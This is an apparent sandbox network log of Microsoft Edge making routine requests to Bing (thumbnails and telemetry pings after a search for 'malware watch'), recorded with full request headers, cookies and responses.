accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: ak_bmsc=36919174BCEB2C1969D3ADC2940FB93D~000000000000000000000000000000~YAAQMjZ6XBxEd5OUAQAAfs89uRoTbVP56O6YAnbh6429jnaFf2b2t5pk5DDjonSc/sY2rwzMCZYb83oWj2T55anMb2Ng0NJVU5HS0Dsh80ohCJnD7tBBSh1r4WJjKkms/rsti6QCaZ8nRKLtH3KZkQK+8IX9ish50O12G9/SnCOyev4cxjNdmjO0RPxBzCWJbxgz93wcjM1zeTWBCKRFjUeRpwnHPR8E5AiW6cP52GNFLH9pjXGVaWF7UiXcUJL1EEUzNiMDPXBBitILp65+4Xq6SjeV5sLVxsFxGHuseCvjpEXQN8aQDrhJuUGNGU/SqO5OGbBHiXcBFvXnIzsGxsCIThG96ArxmTXqDrmIaFeN0/4F9YB9naqiqe80JRNfVAfUN6Su8p+i
cookie: MUID=2B1BFC6B1DFE63020FDCE9EF1C62624D
cookie: _EDGE_S=F=1&SID=05DFC6CDCE37668C2381D349CFAB67A5
cookie: _EDGE_V=1
cookie: _SS=PC=U531&SID=05DFC6CDCE37668C2381D349CFAB67A5
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=B572832A81B54D2484A18E26A0E9EAD7&dmnchg=1
cookie: SRCHUSR=DOB=20250130
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=2918&DPR=1.0&UTC=0&PV=10.0
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|
ResponseHTTP/2.0 200
access-control-allow-origin: *
date: Thu, 30 Jan 2025 22:03:48 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.32367a5c.1738274628.1ad0f68a
-
GEThttps://th.bing.com/th?id=ODLS.3bc1a8a9-5d72-433e-aea7-1fd5fa3fea80&w=16&h=16&c=7&o=6&pid=1.7msedge.exeRemote address:88.221.135.16:443RequestGET /th?id=ODLS.3bc1a8a9-5d72-433e-aea7-1fd5fa3fea80&w=16&h=16&c=7&o=6&pid=1.7 HTTP/2.0
host: th.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: ak_bmsc=36919174BCEB2C1969D3ADC2940FB93D~000000000000000000000000000000~YAAQMjZ6XBxEd5OUAQAAfs89uRoTbVP56O6YAnbh6429jnaFf2b2t5pk5DDjonSc/sY2rwzMCZYb83oWj2T55anMb2Ng0NJVU5HS0Dsh80ohCJnD7tBBSh1r4WJjKkms/rsti6QCaZ8nRKLtH3KZkQK+8IX9ish50O12G9/SnCOyev4cxjNdmjO0RPxBzCWJbxgz93wcjM1zeTWBCKRFjUeRpwnHPR8E5AiW6cP52GNFLH9pjXGVaWF7UiXcUJL1EEUzNiMDPXBBitILp65+4Xq6SjeV5sLVxsFxGHuseCvjpEXQN8aQDrhJuUGNGU/SqO5OGbBHiXcBFvXnIzsGxsCIThG96ArxmTXqDrmIaFeN0/4F9YB9naqiqe80JRNfVAfUN6Su8p+i
cookie: MUID=2B1BFC6B1DFE63020FDCE9EF1C62624D
cookie: _EDGE_S=F=1&SID=05DFC6CDCE37668C2381D349CFAB67A5
cookie: _EDGE_V=1
cookie: _SS=PC=U531&SID=05DFC6CDCE37668C2381D349CFAB67A5
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=B572832A81B54D2484A18E26A0E9EAD7&dmnchg=1
cookie: SRCHUSR=DOB=20250130
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=2918&DPR=1.0&UTC=0&PV=10.0
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|
ResponseHTTP/2.0 200
access-control-allow-origin: *
date: Thu, 30 Jan 2025 22:03:48 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.32367a5c.1738274628.1ad0f689
-
GEThttps://th.bing.com/th?id=ODLS.41714610-7805-4084-b931-dc0a6d82432e&w=32&h=32&qlt=96&pcl=fffffa&o=6&pid=1.2msedge.exeRemote address:88.221.135.16:443RequestGET /th?id=ODLS.41714610-7805-4084-b931-dc0a6d82432e&w=32&h=32&qlt=96&pcl=fffffa&o=6&pid=1.2 HTTP/2.0
host: th.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: ak_bmsc=36919174BCEB2C1969D3ADC2940FB93D~000000000000000000000000000000~YAAQMjZ6XBxEd5OUAQAAfs89uRoTbVP56O6YAnbh6429jnaFf2b2t5pk5DDjonSc/sY2rwzMCZYb83oWj2T55anMb2Ng0NJVU5HS0Dsh80ohCJnD7tBBSh1r4WJjKkms/rsti6QCaZ8nRKLtH3KZkQK+8IX9ish50O12G9/SnCOyev4cxjNdmjO0RPxBzCWJbxgz93wcjM1zeTWBCKRFjUeRpwnHPR8E5AiW6cP52GNFLH9pjXGVaWF7UiXcUJL1EEUzNiMDPXBBitILp65+4Xq6SjeV5sLVxsFxGHuseCvjpEXQN8aQDrhJuUGNGU/SqO5OGbBHiXcBFvXnIzsGxsCIThG96ArxmTXqDrmIaFeN0/4F9YB9naqiqe80JRNfVAfUN6Su8p+i
cookie: MUID=2B1BFC6B1DFE63020FDCE9EF1C62624D
cookie: _EDGE_S=F=1&SID=05DFC6CDCE37668C2381D349CFAB67A5
cookie: _EDGE_V=1
cookie: _SS=PC=U531&SID=05DFC6CDCE37668C2381D349CFAB67A5
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=B572832A81B54D2484A18E26A0E9EAD7&dmnchg=1
cookie: SRCHUSR=DOB=20250130
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=2918&DPR=1.0&UTC=0&PV=10.0
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|
ResponseHTTP/2.0 200
access-control-allow-origin: *
date: Thu, 30 Jan 2025 22:03:48 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.32367a5c.1738274628.1ad0f716
-
GEThttps://www.bing.com/fd/ls/l?IG=69579D85EA2D4E95B5358DAB8D3A2EA2&CID=2B1BFC6B1DFE63020FDCE9EF1C62624D&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.SERPSB%22,%22FID%22:%22CI%22,%22Name%22:%22CharCount%22,%22Text%22:%2213%22}]msedge.exeRemote address:88.221.135.16:443RequestGET /fd/ls/l?IG=69579D85EA2D4E95B5358DAB8D3A2EA2&CID=2B1BFC6B1DFE63020FDCE9EF1C62624D&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.SERPSB%22,%22FID%22:%22CI%22,%22Name%22:%22CharCount%22,%22Text%22:%2213%22}] HTTP/2.0
host: www.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=malware+watch&cvid=0e73f29b17ee4b719f03106da34802ca&aqs=edge..69i57j0l6.1385j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: ak_bmsc=36919174BCEB2C1969D3ADC2940FB93D~000000000000000000000000000000~YAAQMjZ6XBxEd5OUAQAAfs89uRoTbVP56O6YAnbh6429jnaFf2b2t5pk5DDjonSc/sY2rwzMCZYb83oWj2T55anMb2Ng0NJVU5HS0Dsh80ohCJnD7tBBSh1r4WJjKkms/rsti6QCaZ8nRKLtH3KZkQK+8IX9ish50O12G9/SnCOyev4cxjNdmjO0RPxBzCWJbxgz93wcjM1zeTWBCKRFjUeRpwnHPR8E5AiW6cP52GNFLH9pjXGVaWF7UiXcUJL1EEUzNiMDPXBBitILp65+4Xq6SjeV5sLVxsFxGHuseCvjpEXQN8aQDrhJuUGNGU/SqO5OGbBHiXcBFvXnIzsGxsCIThG96ArxmTXqDrmIaFeN0/4F9YB9naqiqe80JRNfVAfUN6Su8p+i
cookie: MUID=2B1BFC6B1DFE63020FDCE9EF1C62624D
cookie: _EDGE_S=F=1&SID=05DFC6CDCE37668C2381D349CFAB67A5
cookie: _EDGE_V=1
cookie: _SS=PC=U531&SID=05DFC6CDCE37668C2381D349CFAB67A5
cookie: MUIDB=2B1BFC6B1DFE63020FDCE9EF1C62624D
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=B572832A81B54D2484A18E26A0E9EAD7&dmnchg=1
cookie: SRCHUSR=DOB=20250130
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=2918&DPR=1.0&UTC=0&PV=10.0
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|
ResponseHTTP/2.0 200
content-type: text/html; charset=utf-8
cache-control: private
content-encoding: br
vary: Accept-Encoding
x-eventid: 679bf74412dd40f2b9a3be85c39f3d61
accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, ECT, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
useragentreductionoptout: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
content-security-policy: script-src https: 'strict-dynamic' 'report-sample' 'wasm-unsafe-eval' 'nonce-ly2NFHOKsdRPkvcvzr7PCK3mCiNOwRPmKPmZPhIkQEY='; base-uri 'self';report-to csp-endpoint
report-to: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
p3p: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
date: Thu, 30 Jan 2025 22:03:48 GMT
set-cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=2918&DPR=1.0&UTC=0&PV=10.0; domain=.bing.com; expires=Tue, 24-Feb-2026 22:03:48 GMT; path=/; secure; SameSite=None
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.32367a5c.1738274628.1ad0f703
-
GEThttps://www.bing.com/fd/ls/l?IG=69579D85EA2D4E95B5358DAB8D3A2EA2&CID=2B1BFC6B1DFE63020FDCE9EF1C62624D&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.SERPSB%22,%22FID%22:%22CI%22,%22Name%22:%22LandingRows%22,%22Text%22:%221%22}]msedge.exeRemote address:88.221.135.16:443RequestGET /fd/ls/l?IG=69579D85EA2D4E95B5358DAB8D3A2EA2&CID=2B1BFC6B1DFE63020FDCE9EF1C62624D&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.SERPSB%22,%22FID%22:%22CI%22,%22Name%22:%22LandingRows%22,%22Text%22:%221%22}] HTTP/2.0
host: www.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=malware+watch&cvid=0e73f29b17ee4b719f03106da34802ca&aqs=edge..69i57j0l6.1385j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: ak_bmsc=36919174BCEB2C1969D3ADC2940FB93D~000000000000000000000000000000~YAAQMjZ6XBxEd5OUAQAAfs89uRoTbVP56O6YAnbh6429jnaFf2b2t5pk5DDjonSc/sY2rwzMCZYb83oWj2T55anMb2Ng0NJVU5HS0Dsh80ohCJnD7tBBSh1r4WJjKkms/rsti6QCaZ8nRKLtH3KZkQK+8IX9ish50O12G9/SnCOyev4cxjNdmjO0RPxBzCWJbxgz93wcjM1zeTWBCKRFjUeRpwnHPR8E5AiW6cP52GNFLH9pjXGVaWF7UiXcUJL1EEUzNiMDPXBBitILp65+4Xq6SjeV5sLVxsFxGHuseCvjpEXQN8aQDrhJuUGNGU/SqO5OGbBHiXcBFvXnIzsGxsCIThG96ArxmTXqDrmIaFeN0/4F9YB9naqiqe80JRNfVAfUN6Su8p+i
cookie: MUID=2B1BFC6B1DFE63020FDCE9EF1C62624D
cookie: _EDGE_S=F=1&SID=05DFC6CDCE37668C2381D349CFAB67A5
cookie: _EDGE_V=1
cookie: _SS=PC=U531&SID=05DFC6CDCE37668C2381D349CFAB67A5
cookie: MUIDB=2B1BFC6B1DFE63020FDCE9EF1C62624D
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=B572832A81B54D2484A18E26A0E9EAD7&dmnchg=1
cookie: SRCHUSR=DOB=20250130
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=2918&DPR=1.0&UTC=0&PV=10.0
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|
ResponseHTTP/2.0 200
access-control-allow-origin: *
date: Thu, 30 Jan 2025 22:03:48 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.32367a5c.1738274628.1ad0f722
-
GEThttps://www.bing.com/images/sbi?mmasync=1&ig=69579D85EA2D4E95B5358DAB8D3A2EA2&iid=.5100&ptn=Web&ep=0&iconpl=1msedge.exeRemote address:88.221.135.16:443RequestGET /images/sbi?mmasync=1&ig=69579D85EA2D4E95B5358DAB8D3A2EA2&iid=.5100&ptn=Web&ep=0&iconpl=1 HTTP/2.0
host: www.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: */*
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/search?q=malware+watch&cvid=0e73f29b17ee4b719f03106da34802ca&aqs=edge..69i57j0l6.1385j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: ak_bmsc=36919174BCEB2C1969D3ADC2940FB93D~000000000000000000000000000000~YAAQMjZ6XBxEd5OUAQAAfs89uRoTbVP56O6YAnbh6429jnaFf2b2t5pk5DDjonSc/sY2rwzMCZYb83oWj2T55anMb2Ng0NJVU5HS0Dsh80ohCJnD7tBBSh1r4WJjKkms/rsti6QCaZ8nRKLtH3KZkQK+8IX9ish50O12G9/SnCOyev4cxjNdmjO0RPxBzCWJbxgz93wcjM1zeTWBCKRFjUeRpwnHPR8E5AiW6cP52GNFLH9pjXGVaWF7UiXcUJL1EEUzNiMDPXBBitILp65+4Xq6SjeV5sLVxsFxGHuseCvjpEXQN8aQDrhJuUGNGU/SqO5OGbBHiXcBFvXnIzsGxsCIThG96ArxmTXqDrmIaFeN0/4F9YB9naqiqe80JRNfVAfUN6Su8p+i
cookie: MUID=2B1BFC6B1DFE63020FDCE9EF1C62624D
cookie: _EDGE_S=F=1&SID=05DFC6CDCE37668C2381D349CFAB67A5
cookie: _EDGE_V=1
cookie: _SS=PC=U531&SID=05DFC6CDCE37668C2381D349CFAB67A5
cookie: MUIDB=2B1BFC6B1DFE63020FDCE9EF1C62624D
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=B572832A81B54D2484A18E26A0E9EAD7&dmnchg=1
cookie: SRCHUSR=DOB=20250130
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=2918&DPR=1.0&UTC=0&PV=10.0
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|
ResponseHTTP/2.0 200
access-control-allow-origin: *
date: Thu, 30 Jan 2025 22:03:48 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.32367a5c.1738274628.1ad0f717
-
GEThttps://www.bing.com/fd/ls/l?IG=69579D85EA2D4E95B5358DAB8D3A2EA2&CID=2B1BFC6B1DFE63020FDCE9EF1C62624D&TYPE=Event.ClientInst&DATA=%5B%7B%22Time%22%3A1253%2C%22time%22%3A1255%2C%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.Latency%22%2C%22TS%22%3A1738274627650%2C%22Name%22%3A%22Loaded%22%2C%22FID%22%3A%22HP%22%7D%5Dmsedge.exeRemote address:88.221.135.16:443RequestGET /fd/ls/l?IG=69579D85EA2D4E95B5358DAB8D3A2EA2&CID=2B1BFC6B1DFE63020FDCE9EF1C62624D&TYPE=Event.ClientInst&DATA=%5B%7B%22Time%22%3A1253%2C%22time%22%3A1255%2C%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.Latency%22%2C%22TS%22%3A1738274627650%2C%22Name%22%3A%22Loaded%22%2C%22FID%22%3A%22HP%22%7D%5D HTTP/2.0
host: www.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=malware+watch&cvid=0e73f29b17ee4b719f03106da34802ca&aqs=edge..69i57j0l6.1385j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: ak_bmsc=36919174BCEB2C1969D3ADC2940FB93D~000000000000000000000000000000~YAAQMjZ6XBxEd5OUAQAAfs89uRoTbVP56O6YAnbh6429jnaFf2b2t5pk5DDjonSc/sY2rwzMCZYb83oWj2T55anMb2Ng0NJVU5HS0Dsh80ohCJnD7tBBSh1r4WJjKkms/rsti6QCaZ8nRKLtH3KZkQK+8IX9ish50O12G9/SnCOyev4cxjNdmjO0RPxBzCWJbxgz93wcjM1zeTWBCKRFjUeRpwnHPR8E5AiW6cP52GNFLH9pjXGVaWF7UiXcUJL1EEUzNiMDPXBBitILp65+4Xq6SjeV5sLVxsFxGHuseCvjpEXQN8aQDrhJuUGNGU/SqO5OGbBHiXcBFvXnIzsGxsCIThG96ArxmTXqDrmIaFeN0/4F9YB9naqiqe80JRNfVAfUN6Su8p+i
cookie: MUID=2B1BFC6B1DFE63020FDCE9EF1C62624D
cookie: _EDGE_S=F=1&SID=05DFC6CDCE37668C2381D349CFAB67A5
cookie: _EDGE_V=1
cookie: _SS=PC=U531&SID=05DFC6CDCE37668C2381D349CFAB67A5
cookie: MUIDB=2B1BFC6B1DFE63020FDCE9EF1C62624D
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=B572832A81B54D2484A18E26A0E9EAD7&dmnchg=1
cookie: SRCHUSR=DOB=20250130
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=2918&DPR=1.0&UTC=0&PV=10.0
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|
ResponseHTTP/2.0 200
content-type: text/html; charset=utf-8
cache-control: no-cache, no-store, must-revalidate
content-encoding: br
expires: -1
pragma: no-cache
vary: Accept-Encoding
x-eventid: 679bf74437f84bfb80a3d46d05788ee1
accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, ECT, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
useragentreductionoptout: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
content-security-policy: script-src https: 'strict-dynamic' 'report-sample' 'wasm-unsafe-eval' 'nonce-I95RBJSjs0o4vl4yd5xTQnoBphj8ewLksXJ7SjoiN00='; base-uri 'self';report-to csp-endpoint
report-to: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
p3p: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
x-ceto-ref: 679bf74437f84bfb80a3d46d05788ee1|AFD:679bf74437f84bfb80a3d46d05788ee1|2025-01-30T22:03:48.595Z
date: Thu, 30 Jan 2025 22:03:48 GMT
set-cookie: _C_ETH=1; domain=.bing.com; path=/; secure; httponly
set-cookie: _C_Auth=
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.32367a5c.1738274628.1ad0f756
-
GEThttps://www.bing.com/fd/ls/l?IG=69579D85EA2D4E95B5358DAB8D3A2EA2&CID=2B1BFC6B1DFE63020FDCE9EF1C62624D&TYPE=Event.ClientInst&DATA=%5B%7B%22comp%22%3A%22loaded%22%2C%22time%22%3A1255%2C%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.Data%22%2C%22TS%22%3A1738274627650%2C%22Name%22%3A%22speech%22%2C%22FID%22%3A%22HP%22%7D%5Dmsedge.exeRemote address:88.221.135.16:443RequestGET /fd/ls/l?IG=69579D85EA2D4E95B5358DAB8D3A2EA2&CID=2B1BFC6B1DFE63020FDCE9EF1C62624D&TYPE=Event.ClientInst&DATA=%5B%7B%22comp%22%3A%22loaded%22%2C%22time%22%3A1255%2C%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.Data%22%2C%22TS%22%3A1738274627650%2C%22Name%22%3A%22speech%22%2C%22FID%22%3A%22HP%22%7D%5D HTTP/2.0
host: www.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=malware+watch&cvid=0e73f29b17ee4b719f03106da34802ca&aqs=edge..69i57j0l6.1385j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: ak_bmsc=36919174BCEB2C1969D3ADC2940FB93D~000000000000000000000000000000~YAAQMjZ6XBxEd5OUAQAAfs89uRoTbVP56O6YAnbh6429jnaFf2b2t5pk5DDjonSc/sY2rwzMCZYb83oWj2T55anMb2Ng0NJVU5HS0Dsh80ohCJnD7tBBSh1r4WJjKkms/rsti6QCaZ8nRKLtH3KZkQK+8IX9ish50O12G9/SnCOyev4cxjNdmjO0RPxBzCWJbxgz93wcjM1zeTWBCKRFjUeRpwnHPR8E5AiW6cP52GNFLH9pjXGVaWF7UiXcUJL1EEUzNiMDPXBBitILp65+4Xq6SjeV5sLVxsFxGHuseCvjpEXQN8aQDrhJuUGNGU/SqO5OGbBHiXcBFvXnIzsGxsCIThG96ArxmTXqDrmIaFeN0/4F9YB9naqiqe80JRNfVAfUN6Su8p+i
cookie: MUID=2B1BFC6B1DFE63020FDCE9EF1C62624D
cookie: _EDGE_S=F=1&SID=05DFC6CDCE37668C2381D349CFAB67A5
cookie: _EDGE_V=1
cookie: _SS=PC=U531&SID=05DFC6CDCE37668C2381D349CFAB67A5
cookie: MUIDB=2B1BFC6B1DFE63020FDCE9EF1C62624D
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=B572832A81B54D2484A18E26A0E9EAD7&dmnchg=1
cookie: SRCHUSR=DOB=20250130
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=2918&DPR=1.0&UTC=0&PV=10.0
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|
ResponseHTTP/2.0 200
content-type: image/svg+xml
content-md5: iOPtPdfu4TP3P/udNrBLbw==
last-modified: Mon, 15 Aug 2022 20:49:31 GMT
etag: 0x8DA7EFFA703EB5F
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: b8d4fb37-c01e-008b-0cf0-081e4b000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
akamai-grn: 0.0a7b1060.1686747743.231c1613
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
akamai-grn: 0.157b1060.1686747764.1d5c2bc1
akamai-grn: 0.1b7b1060.1687776384.1457d6ce
cache-control: public, no-transform, max-age=3524309
expires: Wed, 12 Mar 2025 17:02:17 GMT
date: Thu, 30 Jan 2025 22:03:48 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.32367a5c.1738274628.1ad0f7c6
timing-allow-origin: *
-
